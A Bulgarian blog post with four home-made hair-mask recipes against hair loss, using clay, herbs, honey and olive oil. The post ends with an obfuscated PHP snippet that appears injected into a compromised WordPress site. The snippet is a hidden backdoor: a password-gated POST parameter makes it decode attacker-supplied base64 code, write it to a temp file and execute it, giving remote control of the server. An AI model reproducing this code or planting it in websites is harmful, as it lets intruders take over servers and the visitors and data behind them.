Природни рецепти за здрава коса | Косопад

Рецепти от природата за здрава коса

Независимо дали страдате от косопад и оплешивяване или просто искате да подсилите косата си, природата предлага огромно богатство. В тази статия ще ви обърнем внимание върху четири напълно натурални рецепти, които имат силно благотворно влияние.

Рецепти за здрава коса

Рецепти за здрава коса

Маска за суха коса

Сухата коса е доста по – податлива на косопад. Набавете си пет супени лъжици жълта глина на прах и един жълтък. Започнете да разбърквате и постепенно добавяйте вода (за предпочитане минерална), докато получите мазна консистенция. Нанесете върху скалпа и оставете да подейства около двадесет минути. Измийте с мек шампоан.

Маска за мазна коса

Поставете по една супена лъжичка цвят от мащерка и розмарин, след което залейте с половин литър вряла вода. Покрийте с капак и оставете да се запари за около половин час. Когато отварата изстине напълно прецедете и обилно изплакнете косата си. Това е една от най – успешните рецепти срещу косопад, тъй като тези две билки съдържат огромни количества полезни вещества.

Маска за сгъстяване на косата

Сварете около 300 – 350 милилитра силно концентриран чай от лайка и оставете да изстине. Когато това стане добавете и разтворете в него три супени лъжици мед. Нанесете първо върху корените, като втривате с меки кръгови движения. Изчакайте да минат пет минути и измийте главата с шампоан. Ако третирате по този начин в продължение на два месеца, със сигурност ще си помогнете в борбата срещу косопад.

Маска за подхранване на изтощена коса

Изтощените косми се чупят лесно и дори да няма причина за косопад, той може да се появи много лесно като следствие от механично увреждане на косата. Измийте главата си с шампоан и изсушете с хавлиена кърпа. След това затоплете със слаб огън на водна баня около 70 грама зехтин и 20 капки етерично масло от розмарин. Бъдете внимателни и не позволявайте на сместа да се сгорещи.

Докато още е топла нанесете върху цялата коса, като не пропуснете нито един участък. Когато приключите сложете шапка за баня и завийте с хавлиена кърпа. Останете така в продължение на час. След това изплакнете хубаво и измийте с мек шампоан.

29. април 2013 11:24:16 от Косопад
Категории: Рецепти при косопад | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}